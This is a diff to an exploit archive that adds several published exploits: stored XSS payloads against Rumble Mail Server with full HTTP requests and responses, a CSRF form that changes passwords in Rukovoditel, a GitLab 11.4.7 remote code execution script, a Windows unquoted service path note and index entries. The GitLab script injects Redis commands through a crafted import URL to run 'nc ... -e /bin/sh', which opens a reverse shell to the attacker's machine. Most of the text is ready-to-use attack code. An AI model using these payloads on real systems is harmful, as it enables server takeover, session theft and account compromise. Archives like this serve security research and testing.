+<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
+<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
+<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
+<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
+
+</div>
+</div>
+<div id="contents">
+  <h2>Domains</h2>
+<p>
+  <table class="elements" border='0' cellpadding='5' cellspacing='1'><tr><th>Create a new domain</th></tr><tr><td><b><font color='darkgreen'>Domain <script>alert("XSS")</script> has been created.</font></b></td></tr><tr><td>			<form action="/domains" method="post" id='create'>
+			<div>
+			<div >
+				<div class='form_key'>
+					Domain name:
+				</div>
+				<div class='form_value'>
+					<input type="text" name="domain"/>
+				</div>
+			</div>
+
+			<div>
+				<div class='form_key'>
+					Optional alt. storage path:
+				</div>
+				<div class='form_value'>
+					<input type="text" name="path"/>
+				</div>
+			</div>
+
+
+			<div class='form_el' id='domainsave' >
+				<div class='form_key'>
+						<input type="hidden" name="create" value="true"/>
+					<input class="button" type="submit" value="Save domain"/>
+					<input class="button"  type="reset" value="Reset"/>
+				</div>
+			</div>
+			<br/><br/><br/><br/><br />
+			</div>
+			</form>
+			</td></tr></table></p>
+<p>&nbsp;</p>
+<table class="elements" border='0' cellpadding='5' cellspacing='1'>
+  <tr><th>Domain</th><th>Actions</th></tr>
+<tr><td><img src='/icons/house.png' align='absmiddle'/>&nbsp;<a href='/accounts:<script>alert("XSS")</script>'><strong><script>alert("XSS")</script></strong></a></td><td><a href="/domains:<script>alert("XSS")</script>"><img title='Edit domain' src='/icons/report_edit.png' align='absmiddle'/></a>  <a href="/domains?domain=<script>alert("XSS")</script>&delete=true"><img title='Delete domain' src='/icons/delete.png' align='absmiddle'/></a></td></tr></table>
+</div>
+<br />
+<p align="center">
+Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
+</p>
+</body>
+
+
+</html>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49255.txt b/exploits/multiple/webapps/49255.txt
new file mode 100644
index 000000000..50b5847d1
--- /dev/null
+++ b/exploits/multiple/webapps/49255.txt
@@ -0,0 +1,146 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Exploit:
+POST /users HTTP/1.1
+Host: 127.0.0.1:2580
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 96
+Origin: http://127.0.0.1:2580
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: keep-alive
+Referer: http://127.0.0.1:2580/users
+Upgrade-Insecure-Requests: 1
+
+username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<link rel="shortcut icon" href="/favicon.ico " />
+<title>RumbleLua</title>
+<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<div class="header_top">
+  <div class="header_stuff">
+    RumbleLua on a.com<br />
+    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
+    </span>
+
+<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
+<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
+
+<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
+<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
+<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
+<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
+<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
+
+</div>
+</div>
+<div id="contents">
+
+
+<h1>RumbleLua users </h1>
+<p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br />
+Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br />
+while regular users can only
+see and edit the domains they have access to.
+</p>
+<table class="elements">
+  <tr>
+    <th>Create a new user:</th>
+  </tr>
+<tr>
+<td>
+<form action="/users" method="post" name="makeuser">
+
+  <div style="width: 300px; text-align:right; float: left;">
+    <label for="username"><strong>Username:</strong></label>
+    <input name="username" autocomplete="off" type="text" id="username" >
+    <br>
+    <label for="password"><strong>Password:</strong></label>
+    <input type="password" autocomplete="off" name="password" id="password">
+    <br />
+    <label for="password"><strong>Access rights:</strong></label>
+    <select name="rights" size="4" style="width: 150px;" multiple="multiple">
+    <option value="*" style="color:#C33; font-weight:bold;">Full control</option>
+    <optgroup label="Domains:">
+        </optgroup>
+    </select>
+      </div>
+    <p><br /><br />
+<br />
+<br />
+<br />
+<br />
+<br />
+<br />
+<br />
+<br />
+
+      &nbsp;&nbsp;
+      <input type="submit" name="submit" id="submit" value="Submit" />
+    </p>
+
+</form>
+</td>
+</tr>
+</table>
+<table width="200" class="elements">
+  <tr>
+    <th>Username</th>
+    <th>Rights</th>
+    <th>Actions</th>
+  </tr>
+  <tr>
+    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M507")</script></font></strong></td>
+    <td>Full control</td>
+    <td>
+	<a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
+	<a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
+	</td>
+  </tr>
+    <tr>
+    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'>admin</font></strong></td>
+    <td>Full control</td>
+    <td>
+	<a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
+	<a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
+	</td>
+  </tr>
+    <tr>
+    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M5072")</script></font></strong></td>
+    <td>Full control</td>
+    <td>
+	<a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
+	<a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
+	</td>
+  </tr>
+  </table>
+<p>&nbsp;</p>
+
+
+</div>
+<br />
+<p align="center">
+Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
+</p>
+</body>
+
+
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/49245.txt b/exploits/php/webapps/49245.txt
new file mode 100644
index 000000000..b67419f9e
--- /dev/null
+++ b/exploits/php/webapps/49245.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change 
+password)
+# Date: 2020-12-14
+# Exploit Author: KeopssGroup0day,Inc
+# Vendor Homepage: https://www.rukovoditel.net/
+# Software Link: https://www.rukovoditel.net/download.php
+# Version: v2.6.1
+# Tested on: Kali Linux
+
+POC(localhost/index.php?module=users/change_password):
+
+<html>
+   <!-- CSRF PoC  -->
+   <body>
+   <script>history.pushState('', '', '/')</script>
+     <form 
+action="https://localhost/index.php?module=users/change_password&action=change" 
+method="POST">
+       <input type="hidden" name="form&#95;session&#95;token" 
+value="D&#94;HUyTDh0X" />
+       <input type="hidden" name="password&#95;new" value="123456789" />
+       <input type="hidden" name="password&#95;confirmation" 
+value="123456789" />
+       <input type="submit" value="Submit request" />
+     </form>
+   </body>
+</html>
+
+
+--
\ No newline at end of file
diff --git a/exploits/ruby/webapps/49257.py b/exploits/ruby/webapps/49257.py
new file mode 100755
index 000000000..e44dae0c7
--- /dev/null
+++ b/exploits/ruby/webapps/49257.py
@@ -0,0 +1,64 @@
+# Exploit Title: Gitlab 11.4.7 - Remote Code Execution
+# Date: 14-12-2020
+# Exploit Author: Fortunato Lodari fox [at] thebrain [dot] net, foxlox
+# Vendor Homepage: https://about.gitlab.com/
+# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
+# Tested On: Debian 10 + Apache/2.4.46 (Debian)
+# Version: 11.4.7 community
+
+import sys
+import requests
+import time
+import random
+import http.cookiejar
+import os.path
+from os import path
+
+# Sign in GitLab 11.4.7  portal and get (using Burp or something other):
+# authenticity_token
+# authenticated cookies
+# username
+# specify localport and localip for reverse shell
+
+username='aaaaaaaaaaaa'
+authenticity_token='jpT/n1EoPwwWtiGu/+QKVQomofMNyqAQXY+iD2kVoRQoiQNzcFHPAj2+M4pyblKo/7UkClKW8jvp51Aw2qzs7g=='
+cookie = '_gitlab_session=c942527505cc0580c026610a1799b811; sidebar_collapsed=false'
+localport='1234'
+localip='192.168.0.114'
+
+
+url = "http://192.168.0.130:5080"
+proxies = { "http": "http://localhost:8080" }
+
+
+def deb(str):
+    print("Debug => "+str)
+
+def create_payload(authenticity_token,prgname,namespace_id,localip,localport,username):
+    return {'utf8':'✓','authenticity_token':authenticity_token,'project[ci_cd_only]':'false','project[name]':prgname,'project[namespace_id]':namespace_id,'project[path]':prgname,'project[description]':prgname,'project[visibility_level]':'20','':'project[initialize_with_readme]','project[import_url]':'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\'|nc '+localip+' '+localport+' -e /bin/sh\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"\n exec\n exec\n exec\n/'+username+'/'+prgname+'.git'}
+
+import string
+def random_string(length):
+    return ''.join(random.choice(string.ascii_letters) for m in range(length))
+
+def init(username,cookie,authenticity_token,localport,localip):
+    from bs4 import BeautifulSoup
+    import re
+    import urllib.parse
+    deb("Token: "+authenticity_token)
+    deb("Cookie: "+cookie)
+    session=requests.Session()
+    headers = {'user-agent':'Moana Browser 1.0','Cookie':cookie,'Content-Type':'application/x-www-form-urlencoded','DNT':'1','Upgrade-Insecure-Requests':'1'}
+    r=session.get(url+'/projects/new',headers=headers,allow_redirects=True)
+    soup = BeautifulSoup(r.content,"lxml")
+    nsid = soup.findAll('input', {"id": "project_namespace_id"})
+    namespace_id=nsid[0]['value'];
+    deb("Namespace ID: "+namespace_id)
+    prgname=random_string(8)
+    newpayload=create_payload(authenticity_token,prgname,namespace_id,localip,localport,username)
+    newpayload=urllib.parse.urlencode(newpayload)
+    deb("Payload encoded: "+newpayload)
+    r=session.post(url+'/projects',newpayload,headers=headers,allow_redirects=False)
+    os.system("nc -nvlp "+localport)
+
+init(username,cookie,authenticity_token,localport,localip)
\ No newline at end of file
diff --git a/exploits/windows/local/49248.txt b/exploits/windows/local/49248.txt
new file mode 100644
index 000000000..3b3f8ec5f
--- /dev/null
+++ b/exploits/windows/local/49248.txt
@@ -0,0 +1,29 @@
+# Exploit Title: System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path
+# Date: 2020-10-14
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://systemexplorer.net/
+# Software Link:  http://systemexplorer.net/download/SystemExplorerSetup.exe
+# Version: Version 7.0.0
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Service info:
+
+C:\Users\m507>sc qc SystemExplorerHelpService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SystemExplorerHelpService
+        TYPE               : 20  WIN32_SHARE_PROCESS
+        START_TYPE         : 3   DEMAND_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : System Explorer Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 68282e8af..7875249b9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11230,6 +11230,7 @@ id,file,description,date,author,type,platform,port
 49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
 49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple,
 49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
+49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43463,3 +43464,15 @@ id,file,description,date,author,type,platform,port
 49241,exploits/php/webapps/49241.txt,"Courier Management System 1.0 - 'First Name' Stored XSS",2020-12-11,Zhaiyi,webapps,php,
 49242,exploits/php/webapps/49242.txt,"Courier Management System 1.0 - 'MULTIPART street ((custom) ' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
 49243,exploits/php/webapps/49243.txt,"Courier Management System 1.0 - 'ref_no' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
+49245,exploits/php/webapps/49245.txt,"Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)",2020-12-14,KeopssGroup0day_Inc,webapps,php,
+49246,exploits/multiple/webapps/49246.py,"LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection",2020-12-14,Hodorsec,webapps,multiple,
+49247,exploits/multiple/webapps/49247.py,"MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)",2020-12-14,securityforeveryone.com,webapps,multiple,
+49249,exploits/multiple/webapps/49249.txt,"Seacms 11.1 - 'ip and weburl' Remote Command Execution",2020-12-14,j5s,webapps,multiple,
+49250,exploits/multiple/webapps/49250.txt,"Seacms 11.1 - 'file' Local File Inclusion",2020-12-14,j5s,webapps,multiple,
+49251,exploits/multiple/webapps/49251.txt,"Seacms 11.1 - 'checkuser' Stored XSS",2020-12-14,j5s,webapps,multiple,
+49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,
+49253,exploits/multiple/webapps/49253.txt,"Rumble Mail Server 0.51.3135 - 'servername' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,
+49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby,